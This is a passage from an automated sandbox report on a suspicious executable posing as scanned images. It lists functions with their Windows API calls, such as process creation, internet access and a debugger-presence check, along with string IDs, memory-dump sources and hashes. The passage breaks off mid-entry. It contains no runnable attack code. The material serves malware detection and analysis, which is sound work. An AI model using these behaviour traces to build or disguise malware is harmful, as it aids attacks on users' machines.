                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CrackInternet_wcslen
                                                                                • String ID: |
                                                                                • API String ID: 596671847-2343686810
                                                                                • Opcode ID: 0dfd42092d39c1abad762498e3729f3beaa7c3e90a4a83f8171e8cf6844b405a
                                                                                • Instruction ID: 7f07fc2c5692ec9fe3b699108b3a6779b8d7a20ebef899cacb32e2886b026ef6
                                                                                • Opcode Fuzzy Hash: 0dfd42092d39c1abad762498e3729f3beaa7c3e90a4a83f8171e8cf6844b405a
                                                                                • Instruction Fuzzy Hash: 94310975D01109ABCF55EFA5CC85EEE7FB9FF04304F00002AF815A6262DB35AA56CB54
                                                                                Function 004E356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 004E3621
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004E365C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                • Opcode ID: 637ff2697ca97f84238301a8c741b3a804043bbf26b3c8cd82d2684600f31601
                                                                                • Instruction ID: 24ff72fc51d52b03ba12a98dfe8ca6691fa325403ffb5818a94d1b4e86c16991
                                                                                • Opcode Fuzzy Hash: 637ff2697ca97f84238301a8c741b3a804043bbf26b3c8cd82d2684600f31601
                                                                                • Instruction Fuzzy Hash: BA31B271100244AEDB21DF35DC84EFB73A9FF48725F00861EF8A597280DA35AD82D768
                                                                                Function 004E4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004E461F
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004E4634
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                • Opcode ID: 546a3f379f0ca87221d4c9c6f021a0afbb34ef6f993662c6ea33077b45a8e385
                                                                                • Instruction ID: cd9477c96167999a5bd76a761612bb940236f5074f615dd7f2f99ac8497985e8
                                                                                • Opcode Fuzzy Hash: 546a3f379f0ca87221d4c9c6f021a0afbb34ef6f993662c6ea33077b45a8e385
                                                                                • Instruction Fuzzy Hash: C5314C74A01349AFDF14CFAAC980BDA7BB5FF49301F10406AEA04AB381D774A941CF94
                                                                                Function 004E31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004E327C
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E3287
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                • Opcode ID: 36c27ab85d3569fe561aff6dc575901ed25026bd3286a81c63f8ddeec30a928c
                                                                                • Instruction ID: a46b383d293c67e69513c5ec66ab1688d11ebc431547063f34165b79645f20bf
                                                                                • Opcode Fuzzy Hash: 36c27ab85d3569fe561aff6dc575901ed25026bd3286a81c63f8ddeec30a928c
                                                                                • Instruction Fuzzy Hash: 4411E6713001487FFF229F55DC84EBB376AEB54366F10012AFA5897290D6359D518764
                                                                                Function 004E3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0045600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0045604C
                                                                                  • Part of subcall function 0045600E: GetStockObject.GDI32(00000011), ref: 00456060
                                                                                  • Part of subcall function 0045600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0045606A
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004E377A
                                                                                • GetSysColor.USER32(00000012), ref: 004E3794
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                • Opcode ID: f09522650518507d1e6437d1f5083824de871bbf4720be1d3a34fe6383359cb2
                                                                                • Instruction ID: 9fa05ab590097ea4b918bd90235da20adeaf7946fb96a1f759c03804f3f15599
                                                                                • Opcode Fuzzy Hash: f09522650518507d1e6437d1f5083824de871bbf4720be1d3a34fe6383359cb2
                                                                                • Instruction Fuzzy Hash: 2A1159B2610249AFDF11DFA9CC89AEA7BB8EF08316F004529F955E3250D738E8119B54
                                                                                Function 004CCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004CCD7D
                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004CCDA6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                • Opcode ID: 0d0552717a97d374c17d9b10ab64a341f36e1f0047a3ecda7eebbc2ec0d5bc2f
                                                                                • Instruction ID: dfa650092118dd3417c6b59a7c2ffdc41c58509fc64ada534353d31503308ba7
                                                                                • Opcode Fuzzy Hash: 0d0552717a97d374c17d9b10ab64a341f36e1f0047a3ecda7eebbc2ec0d5bc2f
                                                                                • Instruction Fuzzy Hash: 0611E379641632BAD7644A668CC4FE3BE6CEB127A4F00423BF10E82180D2789841D6F4
                                                                                Function 004E3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 004E34AB
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004E34BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                • Opcode ID: da5994e0c4b54a73d49775e344530356c06b4471847479d378cba5c824fd42ef
                                                                                • Instruction ID: 9921c99c2b5ca71a0d2d6dc4d9d4c516ea5aaefb61abf69623c1f954b0fbbc37
                                                                                • Opcode Fuzzy Hash: da5994e0c4b54a73d49775e344530356c06b4471847479d378cba5c824fd42ef
                                                                                • Instruction Fuzzy Hash: 3D110471100144AFEF124E66DC88AFB3769EF0137AF504725F960932D0C339DC529B58
                                                                                Function 004B6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 004B6CB6
                                                                                • _wcslen.LIBCMT ref: 004B6CC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: STOP
                                                                                • API String ID: 1256254125-2411985666
                                                                                • Opcode ID: 18c364c64d944e5faf4e5604b46869418c68ff820a6af00dd787db2a1ac7ce22
                                                                                • Instruction ID: 3fec68cd690104392de220f6b97ca9703b5b4803d5cc833d8fcbcfb6412c6cc9
                                                                                • Opcode Fuzzy Hash: 18c364c64d944e5faf4e5604b46869418c68ff820a6af00dd787db2a1ac7ce22
                                                                                • Instruction Fuzzy Hash: 0E012B326005268BCB10AFBDDC918FF37B9FB60714702093AE85297291EB3DDC05C668
                                                                                Function 004B1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004B1D4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                • Opcode ID: a25e35f5f31ddb97d0d56cec67f3109e2730eb41402b864919faab4bcdaf4608
                                                                                • Instruction ID: 2c2c628a85a6a6c35178362cda12e8d2e2ccf35143f45745d5cba8f2d0cd6a26
                                                                                • Opcode Fuzzy Hash: a25e35f5f31ddb97d0d56cec67f3109e2730eb41402b864919faab4bcdaf4608
                                                                                • Instruction Fuzzy Hash: 6901B575601214AB8B04EBA5CC618FF7769FB46354B54091FA822573D2EA38690D8674
                                                                                Function 004B1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 004B1C46
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                • Opcode ID: ea2755be56226647761ef0ffde7f35b419863696f9b73c4e0f4299769c60d428
                                                                                • Instruction ID: 5e6f144e54f59b4e1b7312e0c196bacf72df7ef72bfcb671b96644f72edf2281
                                                                                • Opcode Fuzzy Hash: ea2755be56226647761ef0ffde7f35b419863696f9b73c4e0f4299769c60d428
                                                                                • Instruction Fuzzy Hash: 6201F775680104A6CB04EBA1C9629FF7BB89B11340F50001FA80767293EA389E0D86B9
                                                                                Function 004B1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 004B1CC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                • Opcode ID: 2225fb56fbfb976f0906bb17c9dc6b2f0b3d47a1f994000ea40ebfb7411e9cf8
                                                                                • Instruction ID: ecdd77702d7f3632c29d21fb4352d4c29c07581fd56c3f9f7b6d820df1e796ca
                                                                                • Opcode Fuzzy Hash: 2225fb56fbfb976f0906bb17c9dc6b2f0b3d47a1f994000ea40ebfb7411e9cf8
                                                                                • Instruction Fuzzy Hash: 6C01DB75640114A7DB05EBA5CA51AFF7BB89B11385F94001BBC0273292EA389F0DD679
                                                                                Function 0046A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0046A529
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer_wcslen
                                                                                • String ID: ,%R$3yJ
                                                                                • API String ID: 2551934079-3779759401
                                                                                • Opcode ID: 7697c8e97a22bba2d3f5897695540d93a4ebb2eab32059b14e335230bbefe289
                                                                                • Instruction ID: 0c8725c89aac2614a5c2edc634a262ee46b1493f2f26b583306bdde19cc7f3d4
                                                                                • Opcode Fuzzy Hash: 7697c8e97a22bba2d3f5897695540d93a4ebb2eab32059b14e335230bbefe289
                                                                                • Instruction Fuzzy Hash: 0401D431701A10E7CA10F769EC57A9D37549B45715F50406FF5062B2C3FE586D068E9F
                                                                                Function 004B1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 004B1DD3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                • Opcode ID: 36015f78e7a46604ddfb2db028607aa11af7cecea1114d1d766d191f021d2b0f
                                                                                • Instruction ID: 3d7705387acb0f84399e6c9e7ed5eed192557b4ac50df6499db27c582b5cee05
                                                                                • Opcode Fuzzy Hash: 36015f78e7a46604ddfb2db028607aa11af7cecea1114d1d766d191f021d2b0f
                                                                                • Instruction Fuzzy Hash: E9F0F971A50214A6D704F7A5CC51AFF777CAB01344F84091FB822632D2EA78690D8278
                                                                                Function 004E8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00523018,0052305C), ref: 004E81BF
                                                                                • CloseHandle.KERNEL32 ref: 004E81D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: \0R
                                                                                • API String ID: 3712363035-3234072813
                                                                                • Opcode ID: 2ed681e4d552527897de401306a591bc68d812aae95366a9a0250fe35a9b1746
                                                                                • Instruction ID: 963de987f1649440beea37d357fd25f301a3c2333af23cc7a800a760e1458c51
                                                                                • Opcode Fuzzy Hash: 2ed681e4d552527897de401306a591bc68d812aae95366a9a0250fe35a9b1746
                                                                                • Instruction Fuzzy Hash: 7CF05EB1640310BAE3206761AC89FB73A9CEF16755F004425BF0CD91A2D67D8A0592FC
                                                                                Function 004D747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: 3, 3, 16, 1
                                                                                • API String ID: 176396367-3042988571
                                                                                • Opcode ID: 03ba7ad9e66086bbc005f2f82577c64b78bcbfb7d85f6558a9372355d75aa8c7
                                                                                • Instruction ID: 89c10d02f46e4c153a796e9257c1faf0fc4600a56c16b4aede3265ccae8e5e39
                                                                                • Opcode Fuzzy Hash: 03ba7ad9e66086bbc005f2f82577c64b78bcbfb7d85f6558a9372355d75aa8c7
                                                                                • Instruction Fuzzy Hash: 6BE02B82204220119232127B9CD19BF5A89DFC9760710182FFA89C2366FB9C8D9193A9
                                                                                Function 004B0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004B0B23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                • API String ID: 2030045667-4017498283
                                                                                • Opcode ID: ed0fe37f1eb9f9a42c047195430069234d4f8ac37842a6925bcc3df7765eb3c2
                                                                                • Instruction ID: f183ea86e40eb03bf31fc6ba8b4eaca0f4ab9096b8011610861ab9983a23e622
                                                                                • Opcode Fuzzy Hash: ed0fe37f1eb9f9a42c047195430069234d4f8ac37842a6925bcc3df7765eb3c2
                                                                                • Instruction Fuzzy Hash: 20E0D83128434826D2143696BC43FD97E849F05B2AF20442FFB98955C39BEA689046EE
                                                                                Function 00470D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0046F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00470D71,?,?,?,0045100A), ref: 0046F7CE
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0045100A), ref: 00470D75
                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0045100A), ref: 00470D84
                                                                                Strings
                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00470D7F
                                                                                Memory Dump Source
